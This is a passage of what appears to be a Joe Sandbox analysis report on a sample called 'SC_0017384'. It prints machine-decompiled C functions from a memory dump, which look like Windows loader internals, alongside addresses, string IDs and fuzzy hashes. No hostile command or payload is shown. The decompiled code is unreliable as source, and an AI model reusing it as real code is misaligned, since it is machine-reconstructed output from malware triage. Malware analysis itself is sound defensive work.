										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                              0x0179f0d3
                                                                              0x0179f0d9
                                                                              0x0179f0e0
                                                                              0x0179f0e7
                                                                              0x0179f0f2
                                                                              0x0179f0f4
                                                                              0x0179f0f8
                                                                              0x0179f100
                                                                              0x0179f108
                                                                              0x0179f10d
                                                                              0x0179f115
                                                                              0x0179f116
                                                                              0x0179f11f
                                                                              0x0179f123
                                                                              0x0179f124
                                                                              0x0179f12c
                                                                              0x0179f130
                                                                              0x0179f134
                                                                              0x0179f13d
                                                                              0x0179f144
                                                                              0x0179f14b
                                                                              0x0179f152
                                                                              0x017dbab0
                                                                              0x017dbab0
                                                                              0x0179f158
                                                                              0x0179f158
                                                                              0x0179f15a
                                                                              0x0179f160
                                                                              0x0179f165
                                                                              0x0179f166
                                                                              0x0179f16f
                                                                              0x0179f173
                                                                              0x017dbaa7
                                                                              0x017dbaa7
                                                                              0x017dbaab
                                                                              0x00000000
                                                                              0x0179f179
                                                                              0x0179f18d
                                                                              0x0179f191
                                                                              0x017dbaa2
                                                                              0x00000000
                                                                              0x0179f197
                                                                              0x0179f19b
                                                                              0x0179f1a2
                                                                              0x0179f1a9
                                                                              0x0179f1af
                                                                              0x0179f1b2
                                                                              0x0179f1b6
                                                                              0x0179f1b9
                                                                              0x0179f1c4
                                                                              0x0179f1d8
                                                                              0x0179f1df
                                                                              0x0179f1e3
                                                                              0x0179f1eb
                                                                              0x0179f1ee
                                                                              0x0179f1f4
                                                                              0x0179f20f
                                                                              0x017dbab7
                                                                              0x017dbabb
                                                                              0x017dbacc
                                                                              0x017dbad1
                                                                              0x0179f215
                                                                              0x0179f218
                                                                              0x0179f226
                                                                              0x0179f22b
                                                                              0x00000000
                                                                              0x0179f22b
                                                                              0x0179f1f6
                                                                              0x0179f1f6
                                                                              0x0179f1f9
                                                                              0x0179f1fb
                                                                              0x0179f1fb
                                                                              0x0179f1f4
                                                                              0x0179f191
                                                                              0x0179f173
                                                                              0x0179f152
                                                                              0x0179f203

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                              • Instruction ID: 7b4aac41e78cca59904e28043c7fb1f81da55422d6c8413e4b25c50dca35a941
                                                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                              • Instruction Fuzzy Hash: 2C516A71504711ABC320DF19C841A6BFBF8FF88714F108A29FA9587690E7B4E914CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 75%
                                                                              			E017E3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x185d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E017A0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E017E3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E017AFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E017E3540;
						E017AFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E017BDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E017F0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E017A97C0();
					}
					return E017AB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E017E3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E017E3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E017AFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E017A9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E017E3787(_a4,  &_v352, _t80);
						}
					}
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E017A95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                              0x017e3552
                                                                              0x017e355a
                                                                              0x017e355d
                                                                              0x017e3566
                                                                              0x017e3567
                                                                              0x017e357e
                                                                              0x017e358f
                                                                              0x017e35a1
                                                                              0x017e35a5
                                                                              0x017e366b
                                                                              0x017e366b
                                                                              0x017e366d
                                                                              0x017e3672
                                                                              0x017e3679
                                                                              0x017e3685
                                                                              0x017e368d
                                                                              0x017e369d
                                                                              0x017e36a7
                                                                              0x017e36b8
                                                                              0x017e36c6
                                                                              0x017e36c7
                                                                              0x017e36dc
                                                                              0x017e36e1
                                                                              0x017e36e7
                                                                              0x017e36e9
                                                                              0x017e36e9
                                                                              0x017e3703
                                                                              0x017e3703
                                                                              0x017e35b5
                                                                              0x017e35c0
                                                                              0x017e35c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017e35ca
                                                                              0x017e35d7
                                                                              0x017e35e2
                                                                              0x017e35e6
                                                                              0x017e35e8
                                                                              0x017e35f5
                                                                              0x017e35fa
                                                                              0x017e3603
                                                                              0x017e3604
                                                                              0x017e3609
                                                                              0x017e360a
                                                                              0x017e3612
                                                                              0x017e3613
                                                                              0x017e361e
                                                                              0x017e3622
                                                                              0x017e3628
                                                                              0x017e362f
                                                                              0x017e362f
                                                                              0x017e3636
                                                                              0x017e3638
                                                                              0x017e363b
                                                                              0x017e3642
                                                                              0x017e3642
                                                                              0x017e3636
                                                                              0x017e3657
                                                                              0x017e3657
                                                                              0x017e365c
                                                                              0x017e3662
                                                                              0x017e3669
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryHash
                                                                              • API String ID: 0-2202222882
                                                                              • Opcode ID: 0d06f8482ff9db466567a0994227df18f311e2c967471d76e1ae3599d23142dd
                                                                              • Instruction ID: 95c922b543f05e33cd16802229e82c8077bea437f3125ef252c6268ecb1db44d
                                                                              • Opcode Fuzzy Hash: 0d06f8482ff9db466567a0994227df18f311e2c967471d76e1ae3599d23142dd
                                                                              • Instruction Fuzzy Hash: 3E4146B1D0052D9BDB21DA60CC88FDEF7BCAB44714F5045A5EB09AB240DB309E88CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 018305AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E018305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E018307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E017A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0182A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0182A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01831293(_t79, _v40, E018307DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01787D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0182138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                              0x018305c5
                                                                              0x018305ca
                                                                              0x018305d3
                                                                              0x018306db
                                                                              0x018306db
                                                                              0x018306dd
                                                                              0x018306e3
                                                                              0x018306e3
                                                                              0x018305dd
                                                                              0x018305e7
                                                                              0x018305f6
                                                                              0x01830600
                                                                              0x01830607
                                                                              0x01830610
                                                                              0x01830615
                                                                              0x0183061a
                                                                              0x0183061c
                                                                              0x0183061e
                                                                              0x01830624
                                                                              0x01830625
                                                                              0x01830627
                                                                              0x01830628
                                                                              0x01830631
                                                                              0x01830640
                                                                              0x0183064d
                                                                              0x01830654
                                                                              0x01830654
                                                                              0x01830631
                                                                              0x0183066d
                                                                              0x01830674
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01830692
                                                                              0x0183069e
                                                                              0x018306b0
                                                                              0x018306a0
                                                                              0x018306a9
                                                                              0x018306a9
                                                                              0x018306b8
                                                                              0x018306d6
                                                                              0x018306d6
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `
                                                                              • API String ID: 0-2679148245
                                                                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                              • Instruction ID: afd37b461528bf0b6a0c2aba86fd9095d47746df5ec789032dc0a6877ba28a62
                                                                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                              • Instruction Fuzzy Hash: 7B31063220430A6BE711DE19CC44F977BD9EBC4754F184229FA54DB284E7B0EA04C7D1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017E3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 72%
                                                                              			E017E3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E017A9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01784620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E017A9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                              0x017e3893
                                                                              0x017e3896
                                                                              0x017e3899
                                                                              0x017e389f
                                                                              0x017e38a0
                                                                              0x017e38a4
                                                                              0x017e38a9
                                                                              0x017e38ac
                                                                              0x017e38ad
                                                                              0x017e38ae
                                                                              0x017e38af
                                                                              0x017e38b1
                                                                              0x017e38b4
                                                                              0x017e38bb
                                                                              0x017e38bc
                                                                              0x017e38bd
                                                                              0x017e38c4
                                                                              0x017e38c8
                                                                              0x017e38ca
                                                                              0x017e38ca
                                                                              0x017e38d5
                                                                              0x017e393e
                                                                              0x017e3940
                                                                              0x017e3942
                                                                              0x017e3952
                                                                              0x017e3954
                                                                              0x017e3961
                                                                              0x017e3961
                                                                              0x017e3967
                                                                              0x017e396e
                                                                              0x017e396e
                                                                              0x017e3947
                                                                              0x017e394c
                                                                              0x00000000
                                                                              0x017e394c
                                                                              0x017e38ea
                                                                              0x017e38ee
                                                                              0x017e38f8
                                                                              0x017e38f9
                                                                              0x017e38ff
                                                                              0x017e3900
                                                                              0x017e3902
                                                                              0x017e3903
                                                                              0x017e390b
                                                                              0x017e390f
                                                                              0x017e3950
                                                                              0x00000000
                                                                              0x017e3950
                                                                              0x017e3915
                                                                              0x017e391d
                                                                              0x017e391d
                                                                              0x017e3922
                                                                              0x017e3926
                                                                              0x00000000
                                                                              0x017e3928
                                                                              0x017e392b
                                                                              0x017e392b
                                                                              0x017e3935
                                                                              0x017e3937
                                                                              0x017e3937
                                                                              0x00000000
                                                                              0x017e3935
                                                                              0x017e3926
                                                                              0x017e38f0
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: BinaryName
                                                                              • API String ID: 0-215506332
                                                                              • Opcode ID: d1829f69eec6b08128401e2aebc6330d4ca4ae43bd25341784d66aa2d890ed6f
                                                                              • Instruction ID: fb053276682a29d0925086eb0f081e23f70e3d17fbf1f070312b56bc452c83e2
                                                                              • Opcode Fuzzy Hash: d1829f69eec6b08128401e2aebc6330d4ca4ae43bd25341784d66aa2d890ed6f
                                                                              • Instruction Fuzzy Hash: A131E372D0151ABFEB15DA58C949E6FFBF4FF88B24F124169E915A7250D7309E00C7A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 33%
                                                                              			E0179D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x185d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01784120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E017AB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E017A98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E017A95D0();
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                              0x0179d29c
                                                                              0x0179d2a6
                                                                              0x0179d2b1
                                                                              0x0179d2b5
                                                                              0x0179d2b6
                                                                              0x0179d2bc
                                                                              0x0179d2bd
                                                                              0x0179d2be
                                                                              0x0179d2bf
                                                                              0x0179d2c2
                                                                              0x0179d2c4
                                                                              0x0179d2cc
                                                                              0x0179d384
                                                                              0x0179d34b
                                                                              0x0179d34f
                                                                              0x0179d350
                                                                              0x0179d351
                                                                              0x0179d35c
                                                                              0x0179d35c
                                                                              0x0179d2d6
                                                                              0x0179d2da
                                                                              0x0179d2e1
                                                                              0x0179d361
                                                                              0x0179d369
                                                                              0x0179d36d
                                                                              0x0179d2e3
                                                                              0x0179d2e3
                                                                              0x0179d2e3
                                                                              0x0179d2e5
                                                                              0x0179d2ed
                                                                              0x0179d2f5
                                                                              0x0179d2fa
                                                                              0x0179d302
                                                                              0x0179d303
                                                                              0x0179d30b
                                                                              0x0179d30f
                                                                              0x0179d313
                                                                              0x0179d318
                                                                              0x0179d31c
                                                                              0x0179d320
                                                                              0x0179d379
                                                                              0x0179d37d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017daffe
                                                                              0x017db001
                                                                              0x017db011
                                                                              0x00000000
                                                                              0x0179d322
                                                                              0x0179d322
                                                                              0x0179d330
                                                                              0x0179d337
                                                                              0x0179d35d
                                                                              0x0179d339
                                                                              0x0179d33f
                                                                              0x0179d38c
                                                                              0x0179d38c
                                                                              0x0179d33f
                                                                              0x0179d349
                                                                              0x00000000
                                                                              0x0179d349

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: cf89f0a15f9e6733ec8b5259550b14bc819361961fed61f1bc0ea02c2e0b93df
                                                                              • Instruction ID: b443b85fc06c35f87b04566fc64800d12810a5392be0bc6403333c0f36772f72
                                                                              • Opcode Fuzzy Hash: cf89f0a15f9e6733ec8b5259550b14bc819361961fed61f1bc0ea02c2e0b93df
                                                                              • Instruction Fuzzy Hash: 4431E0B1548305DFCB21DF68D884A6BFBE8FBC9654F400A6EF99583210E634DD08CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01771B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 72%
                                                                              			E01771B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E017ABB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E017AA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E017AA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01784620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                              0x01771b8f
                                                                              0x01771b9a
                                                                              0x01771b9c
                                                                              0x01771b9e
                                                                              0x01771ba3
                                                                              0x017c7010
                                                                              0x017c7010
                                                                              0x00000000
                                                                              0x01771ba9
                                                                              0x01771ba9
                                                                              0x01771bae
                                                                              0x00000000
                                                                              0x01771bc5
                                                                              0x01771bca
                                                                              0x01771bcf
                                                                              0x01771bd0
                                                                              0x01771bd1
                                                                              0x01771bd2
                                                                              0x01771bd6
                                                                              0x01771bdc
                                                                              0x01771be0
                                                                              0x017c6ffc
                                                                              0x017c7000
                                                                              0x00000000
                                                                              0x017c7006
                                                                              0x017c7009
                                                                              0x017c7009
                                                                              0x01771be6
                                                                              0x01771bec
                                                                              0x01771c0b
                                                                              0x01771c0b
                                                                              0x01771c0c
                                                                              0x01771c11
                                                                              0x01771c12
                                                                              0x01771c15
                                                                              0x01771c1b
                                                                              0x01771c1f
                                                                              0x01771c31
                                                                              0x01771c33
                                                                              0x017c7026
                                                                              0x017c7026
                                                                              0x01771c21
                                                                              0x01771c24
                                                                              0x01771c24
                                                                              0x01771bee
                                                                              0x01771bee
                                                                              0x01771bf2
                                                                              0x01771c3a
                                                                              0x01771bf4
                                                                              0x01771bf4
                                                                              0x01771c05
                                                                              0x01771c05
                                                                              0x01771c09
                                                                              0x01771c3e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01771c09
                                                                              0x01771bec
                                                                              0x01771be0
                                                                              0x01771bae
                                                                              0x01771c2e

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: WindowsExcludedProcs
                                                                              • API String ID: 0-3583428290
                                                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                              • Instruction ID: cc5bb6b905d5901de9365bde25a7b1078bdf1687eae5b555581af19dff055631
                                                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                              • Instruction Fuzzy Hash: 6B210E77501229ABDF229E99C844F6BFBADEF81B50F454469FE04DB204DA30DD00DBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0178F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0178F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                              0x0178f71d
                                                                              0x0178f722
                                                                              0x0178f726
                                                                              0x017d4770
                                                                              0x0178f765
                                                                              0x0178f769
                                                                              0x0178f769
                                                                              0x0178f732
                                                                              0x017d477a
                                                                              0x00000000
                                                                              0x017d477a
                                                                              0x0178f738
                                                                              0x0178f73a
                                                                              0x0178f73c
                                                                              0x0178f73f
                                                                              0x0178f746
                                                                              0x0178f778
                                                                              0x0178f7a9
                                                                              0x0178f7a9
                                                                              0x0178f754
                                                                              0x0178f75a
                                                                              0x0178f75d
                                                                              0x0178f75f
                                                                              0x0178f761
                                                                              0x0178f76f
                                                                              0x0178f771
                                                                              0x0178f771
                                                                              0x0178f76f
                                                                              0x0178f763
                                                                              0x00000000
                                                                              0x0178f763
                                                                              0x0178f77d
                                                                              0x0178f7a3
                                                                              0x0178f7a5
                                                                              0x00000000
                                                                              0x0178f7a5
                                                                              0x0178f77f
                                                                              0x0178f782
                                                                              0x0178f784
                                                                              0x0178f786
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0178f788
                                                                              0x0178f748
                                                                              0x0178f74d
                                                                              0x0178f78d
                                                                              0x0178f793
                                                                              0x0178f7b7
                                                                              0x0178f7bc
                                                                              0x00000000
                                                                              0x0178f7bc
                                                                              0x0178f798
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0178f79d
                                                                              0x0178f7b0
                                                                              0x00000000
                                                                              0x0178f7b0
                                                                              0x0178f79f
                                                                              0x00000000
                                                                              0x0178f74f
                                                                              0x0178f74f
                                                                              0x00000000
                                                                              0x0178f74f

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx
                                                                              • API String ID: 0-89312691
                                                                              • Opcode ID: a1bf2363467fac875a2d769b14903c6a2c0d2c296b7e5370015493d739a86319
